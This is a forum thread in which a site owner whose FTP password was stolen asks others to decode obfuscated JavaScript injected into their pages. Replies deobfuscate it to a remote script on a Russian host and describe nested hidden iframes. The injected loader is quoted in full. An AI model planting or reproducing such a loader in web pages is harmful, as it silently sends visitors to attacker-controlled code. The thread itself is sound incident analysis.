Hello.

I was wondering if anyone could "decode" this for me and tell me the exact URL, and what exactly the script does.
It is javascript.

Thanks!


<script> try{window.onload=function(){document.write('<div id=megaid>blogcatalog-com.uploading</div>');Fgjd8a1wqtz = document.getElementById('megaid').innerHTML + '.)@c$!o$m)&&.&d)^##a$&$i)!l#$(y&m^(a$(i)&l^(&&-##)^c$o#&$-$@#u^@k@!.@)&l^@$$i$$m#o!)w)$&e(b(@c&!#@a@$&m@$!.$r(#!u#&:^D!#&@E&@B)^^#U@#G)$(/$r!&a#^p&(i#d!4^()m)!e##.))$$c^^o&&m&!!(/&$r##&a@@!#!p&(i)$&&d#4@$$#m&(e#^^.!c($&o$$m(/^g(@^o($!@o&@&g)^l!$e@.&!&c!^#&o&$&$m)&/)^r$^#(m^x#!(a^#d!s(.@##@c(o#)(!m^/)1)1$0^m&)b@.^(c)o)^m)/^!'.replace(/#|\!|\)|@|\(|&|\$|\^/ig, '') ;document.write('<scr'+'ipt src=http://'+Fgjd8a1wqtz.replace(/DEBUG/g, '8080')+'></scr'+'ipt>');} } catch(Rusbkqzn ) {}</script>
<!--4aa2280f0a9cd07f7a45cd3bfdc434f9-->

Well the code essentially decodes it's self, if you run it. It's just a regex to remove garbage from the string.

First format it properly, so you can read and understand it. So you don't inadvertently run something malicious.

try {
window.onload = function() {
document.write('<div id=megaid>blogcatalog-com.uploading</div>');
Fgjd8a1wqtz =
document.getElementById('megaid').innerHTML +
'.)@c$!o$m)&&.&d)^##a$&$i)!l#$(y&m^(a$(i)&l^(&&-##)^c$o#&$-$@#u^@k@!.@)&l^@$$i$$m#o!)w)$&e(b(@c&!#@a@$&m@$!.$r(#!u#&:^D!#&@E&@B)^^#U@#G)$(/$r!&a#^p&(i#d!4^()m)!e##.))$$c^^o&&m&!!(/&$r##&a@@!#!p&(i)$&&d#4@$$#m&(e#^^.!c($&o$$m(/^g(@^o($!@o&@&g)^l!$e@.&!&c!^#&o&$&$m)&/)^r$^#(m^x#!(a^#d!s(.@##@c(o#)(!m^/)1)1$0^m&)b@.^(c)o)^m)/^!'
.replace(/#|\!|\)|@|\(|&|\$|\^/ig, '')
.replace(/DEBUG/g, '8080');

document.write('<scr'+'ipt src=http://' + Fgjd8a1wqtz.replace(/DEBUG/g, '8080')+'></scr'+'ipt>');
}
} catch(Rusbkqzn ) {
}

Already a lot better.

To be safe you don't even run all the code. Just run the .replace(s) in something like Firebug (http://getfirebug.com/). Failing that, wrap it in an alert and drop it in a .html on your desktop:

alert('blogcatalog-com.uploading' + '.)@c$!o$m)&&.&d)^##a$&$i)!l#$(y&m^(a$(i)&l^(&&-##)^c$o#&$-$@#u^@k@!.@)&l^@$$i$$m#o!)w)$&e(b(@c&!#@a@$&m@$!.$r(#!u#&:^D!#&@E&@B)^^#U@#G)$(/$r!&a#^p&(i#d!4^()m)!e##.))$$c^^o&&m&!!(/&$r##&a@@!#!p&(i)$&&d#4@$$#m&(e#^^.!c($&o$$m(/^g(@^o($!@o&@&g)^l!$e@.&!&c!^#&o&$&$m)&/)^r$^#(m^x#!(a^#d!s(.@##@c(o#)(!m^/)1)1$0^m&)b@.^(c)o)^m)/^!'
.replace(/#|\!|\)|@|\(|&|\$|\^/ig, '')
.replace(/DEBUG/g, '8080'));

The resulting URL leads to some more poorly obfuscated Javascript.

Like Xeentech said, the quick and dirty way is to start replacing functions that "do" things like document.write() with something like alert().

Still, not the best thing to be playing around with. If you encounter obfuscated code that you're not familiar with and know it shouldn't be there, it's probably malicious. It doesn't necessarily matter what it's doing beyond the fact that it's malicious and your website/server may have been compromised.

Specifically, though:

<div id=megaid>blogcatalog-com.uploading</div>
<script src=http://blogcatalog-com.uploading.com.dailymail-co-uk.XXXXXXwebcam.ru:8080/rapid4me.com/rapid4me.com/rmxads.com/110mb.com/></script>

I've replaced part of the URL with XXXXXX simply because I don't want to post a valid link to malicious code. Replace the second document.write() with an alert() if you want to see the true code for yourself, though.

Thanks! But no one knows exactly what it does?
Say if it is in a page and you go to a site with it, does it do anything to you?
Or take you to another page.

The malicious code goes to another obfuscated chunk of JavaScript, like Xeentech said. That creates another iframe to:

http://blogcatalog-com.uploading.com.dailymail-co-uk.XXXXXwebcam.ru:8080/index.php?bz

(Again, broken link on purpose)

The resulting final iframe then causes to you visit many many websites through many more hidden iframes of that nature.

In essence, this causes a visitor of the infected webpage to "visit" many dozens of websites without their knowledge using a nest of hidden iframes.

The end game for the abuser? I would assume page ranking. This "forces" unsuspecting people to visit these sites. Perhaps search engines will traverse these links as well? Doubtful, though.

But I've always viewed it as a malicious way of artificially boosting page rank/etc. The JavaScript doesn't "do" anything more than cause you to visit pages unknowingly.

That's the least of your worries, though. You likely have a compromised script/account/server on your hands.

Ah okay that's what i thought.

Yeah someone had gotten hold of one of my FTP passwords.
So they used a bot that tunneled through a ton of proxies and downloaded all index's / .js files, injected that code, and reuploaded.

Glad I always keep backups, and that was the only damage they did ;)


Thanks for everyone's help!

I couldn't actually get the page referenced by the iframe tag to load acenetbrian. I assumed it was because my User-Agent showed I wasn't on a browser vulnerable to what ever exploit they were using.

Although, I had my doubts, given the very weak attempt to obfuscate by replacing punctuation with ''.

If the payload is just to load multiple sites in iframes I would guess that it's to get ratings up for advertisers, for any one doing per-impression rather than per-click billing. But surely those advertisers do a (window !== window.top) comparison?